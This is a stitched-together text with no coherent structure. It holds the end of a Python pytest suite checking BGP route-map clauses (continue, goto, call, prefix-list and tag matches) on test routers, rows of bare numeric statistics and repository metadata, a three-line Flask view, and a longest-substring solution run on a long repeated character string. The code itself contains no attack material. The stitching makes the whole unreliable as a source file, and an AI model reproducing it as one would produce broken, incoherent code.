result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
rmap_name = "rmap_match_pf_1"
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying RIB routes
dut = "r4"
protocol = "bgp"
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r4"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
rmap_name = "rmap_match_pf_2"
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_2_{}".format(addr_type)
result = verify_bgp_attributes(
tgen,
addr_type,
dut,
routes[addr_type],
rmap_name,
input_dict_3_addr_type[addr_type],
expected=False,
)
assert (
result is not True
), "Testcase {} : Failed \nAttributes are not set \n Error: {}".format(
tc_name, result
)
logger.info("Expected behaviour: {}".format(result))
# Verifying RIB routes
dut = "r5"
protocol = "bgp"
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r5"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
rmap_name = "rmap_match_pf_3"
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_3_{}".format(addr_type)
result = verify_bgp_attributes(
tgen,
addr_type,
dut,
routes[addr_type],
rmap_name,
input_dict_3_addr_type[addr_type],
expected=False,
)
assert (
result is not True
), "Testcase {} : Failed \nAttributes are not set \n Error: {}".format(
tc_name, result
)
logger.info("Expected behaviour: {}".format(result))
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_multiple_set_on_single_sequence_in_rmap_p0():
"""
TC_43:
Test multiple set statements as part of a route-map"s
single sequence number.
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "permit"}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{"seqid": 100, "network": "any", "action": "permit"}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"locPrf": 150, "weight": 100, "metric": 50},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv6",
"direction": "in",
}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
rmap_name = "rmap_match_pf_1"
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_route_maps_with_continue_clause_p0():
"""
TC_54:
Verify route-maps continue clause functionality.
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "permit"}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{"seqid": 100, "network": "any", "action": "permit"}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "10",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"locPrf": 150},
"continue": "30",
},
{
"action": "permit",
"seq_id": "20",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"metric": 200},
},
{
"action": "permit",
"seq_id": "30",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"metric": 100},
},
]
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv6",
"direction": "in",
}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
rmap_name = "rmap_match_pf_1"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
seq_id = {"ipv4": ["10", "30"], "ipv6": ["10", "30"]}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result = verify_bgp_attributes(
tgen,
addr_type,
dut,
routes[addr_type],
rmap_name,
input_dict_3,
seq_id[addr_type],
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_route_maps_with_goto_clause_p0():
"""
TC_55:
Verify route-maps goto clause functionality.
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "permit"}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{"seqid": 100, "network": "any", "action": "permit"}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "10",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"goto": "30",
},
{
"action": "permit",
"seq_id": "20",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"metric": 100},
},
{
"action": "permit",
"seq_id": "30",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"metric": 200},
},
]
}
}
}
result = create_route_maps(tgen, input_dict_3)
# tgen.mininet_cli()
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv6",
"direction": "in",
}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
rmap_name = "rmap_match_pf_1"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
seq_id = {"ipv4": ["10", "30"], "ipv6": ["10", "30"]}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result = verify_bgp_attributes(
tgen,
addr_type,
dut,
routes[addr_type],
rmap_name,
input_dict_3,
seq_id[addr_type],
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_route_maps_with_call_clause_p0():
"""
TC_53:
Verify route-maps call clause functionality.
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "permit"}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{"seqid": 100, "network": "any", "action": "permit"}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"locPrf": 150},
"call": "rmap_match_pf_2_{}".format(addr_type),
}
],
"rmap_match_pf_2_{}".format(addr_type): [
{
"action": "permit",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"metric": 200},
}
],
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv6",
"direction": "in",
}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
rmap_name = "rmap_match_pf_1"
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
rmap_name = "rmap_match_pf_2"
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_2_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_create_rmap_match_prefix_list_to_deny_in_and_outbound_prefixes_p0():
"""
TC_58:
Create route map deny inbound and outbound prefixes on
match prefix list and set criteria on match
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "permit"}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{"seqid": 100, "network": "any", "action": "permit"}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "deny",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {
"locPrf": 150,
},
}
],
"rmap_match_pf_2_{}".format(addr_type): [
{
"action": "deny",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"metric": 50},
}
],
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_2_ipv6",
"direction": "out",
}
]
}
}
},
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_2_ipv6",
"direction": "out",
}
]
}
}
},
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(
tgen, addr_type, dut, input_dict, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed \nroutes are not present \n Error: {}".format(
tc_name, result
)
logger.info("Expected behaviour: {}".format(result))
# Verifying RIB routes
dut = "r4"
protocol = "bgp"
for addr_type in ADDR_TYPES:
result = verify_rib(
tgen, addr_type, dut, input_dict, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed \nroutes are not present \n Error: {}".format(
tc_name, result
)
logger.info("Expected behaviour: {}".format(result))
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_create_rmap_to_match_tag_permit_inbound_prefixes_p0():
"""
TC_59:
Create route map to permit inbound prefixes with filter
match tag and set criteria
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
for addr_type in ADDR_TYPES:
# Create Static routes
input_dict = {
"r1": {
"static_routes": [
{"network": NETWORK[addr_type], "next_hop": "Null0", "tag": 4001}
]
}
}
result = create_static_routes(tgen, input_dict)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Api call to redistribute static routes
input_dict_1 = {
"r1": {
"bgp": {
"local_as": 100,
"address_family": {
"ipv4": {
"unicast": {
"redistribute": [
{"redist_type": "static"},
{"redist_type": "connected"},
]
}
},
"ipv6": {
"unicast": {
"redistribute": [
{"redist_type": "static"},
{"redist_type": "connected"},
]
}
},
},
}
}
}
result = create_router_bgp(tgen, topo, input_dict_1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Create route map
input_dict_3 = {
"r1": {
"route_maps": {
"rmap_match_tag_1_{}".format(addr_type): [
{"action": "permit", "match": {addr_type: {"tag": "4001"}}}
]
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_4 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r3": {
"dest_link": {
"r1": {
"route_maps": [
{
"name": "rmap_match_tag_1_ipv4",
"direction": "out",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r3": {
"dest_link": {
"r1": {
"route_maps": [
{
"name": "rmap_match_tag_1_ipv6",
"direction": "out",
}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
for addr_type in ADDR_TYPES:
input_dict = {
"r1": {
"static_routes": [
{"network": NETWORK[addr_type], "next_hop": "Null0", "tag": 4001}
]
}
}
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_create_rmap_to_match_tag_deny_outbound_prefixes_p0():
"""
TC_60
Create route map to deny outbound prefixes with filter match tag,
and set criteria
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
for addr_type in ADDR_TYPES:
# Create Static routes
input_dict = {
"r1": {
"static_routes": [
{"network": NETWORK[addr_type], "next_hop": "Null0", "tag": 4001}
]
}
}
result = create_static_routes(tgen, input_dict)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Api call to redistribute static routes
input_dict_1 = {
"r1": {
"bgp": {
"local_as": 100,
"address_family": {
"ipv4": {
"unicast": {
"redistribute": [
{"redist_type": "static"},
{"redist_type": "connected"},
]
}
},
"ipv6": {
"unicast": {
"redistribute": [
{"redist_type": "static"},
{"redist_type": "connected"},
]
}
},
},
}
}
}
result = create_router_bgp(tgen, topo, input_dict_1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Create route map
input_dict_3 = {
"r1": {
"route_maps": {
"rmap_match_tag_1_{}".format(addr_type): [
{"action": "deny", "match": {addr_type: {"tag": "4001"}}}
]
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_4 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r3": {
"dest_link": {
"r1": {
"route_maps": [
{
"name": "rmap_match_tag_1_ipv4",
"direction": "out",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r3": {
"dest_link": {
"r1": {
"route_maps": [
{
"name": "rmap_match_tag_1_ipv6",
"direction": "out",
}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
for addr_type in ADDR_TYPES:
input_dict = {
"r1": {
"static_routes": [
{"network": NETWORK[addr_type], "next_hop": "Null0", "tag": 4001}
]
}
}
result = verify_rib(
tgen, addr_type, dut, input_dict, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed \nroutes are denied \n Error: {}".format(
tc_name, result
)
logger.info("Expected behaviour: {}".format(result))
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
if __name__ == "__main__":
args = ["-s"] + sys.argv[1:]
sys.exit(pytest.main(args))
| 34.819437
| 99
| 0.354148
| 10,641
| 138,651
| 4.351847
| 0.037872
| 0.056146
| 0.035761
| 0.041116
| 0.926773
| 0.923447
| 0.915911
| 0.912521
| 0.901227
| 0.894619
| 0
| 0.032088
| 0.550245
| 138,651
| 3,981
| 100
| 34.828184
| 0.710515
| 0.07974
| 0
| 0.617394
| 0
| 0
| 0.144302
| 0.00198
| 0
| 0
| 0
| 0
| 0.042717
| 1
| 0.006454
| false
| 0
| 0.00338
| 0
| 0.009834
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
eccd1cecd32d6fb9dab7d4ab7222eec507ab6f01
| 87
|
py
|
Python
|
adoteaqui/adoteaqui/views.py
|
eduardooarruda/AdoteAqui2
|
8b329f9a4b4a6d29158f490ccc59791de7c717a4
|
[
"MIT"
] | null | null | null |
adoteaqui/adoteaqui/views.py
|
eduardooarruda/AdoteAqui2
|
8b329f9a4b4a6d29158f490ccc59791de7c717a4
|
[
"MIT"
] | null | null | null |
adoteaqui/adoteaqui/views.py
|
eduardooarruda/AdoteAqui2
|
8b329f9a4b4a6d29158f490ccc59791de7c717a4
|
[
"MIT"
] | null | null | null |
from flask import render_template
def root():
return render_template('index.html')
| 21.75
| 40
| 0.770115
| 12
| 87
| 5.416667
| 0.833333
| 0.430769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 87
| 4
| 40
| 21.75
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0.113636
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
01cb54a2b9286746173afa7230429ab774854e24
| 32,388
|
py
|
Python
|
src/3_LongestSubstring_Mac.py
|
chenbin11200/AlgorithmInPython
|
222780f14afdafc4c7d0047b6f1477bd0b0ecf0f
|
[
"MIT"
] | null | null | null |
src/3_LongestSubstring_Mac.py
|
chenbin11200/AlgorithmInPython
|
222780f14afdafc4c7d0047b6f1477bd0b0ecf0f
|
[
"MIT"
] | null | null | null |
src/3_LongestSubstring_Mac.py
|
chenbin11200/AlgorithmInPython
|
222780f14afdafc4c7d0047b6f1477bd0b0ecf0f
|
[
"MIT"
] | null | null | null |
class Solution(object):
def lengthOfLongestSubstring(self, s):
"""
:type s: str
:rtype: int
"""
longestSubstringLength = 0
substring = {}
index = 0
while (index+longestSubstringLength) < len(s):
for head in range(index, len(s)):
if s[head] in substring:
index = substring[s[head]] + 1
substring = {}
break
else:
substring[s[head]] = head
if (head-index+1)>longestSubstringLength:
longestSubstringLength = head-index+1
return longestSubstringLength
a = Solution().lengthOfLongestSubstring("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ 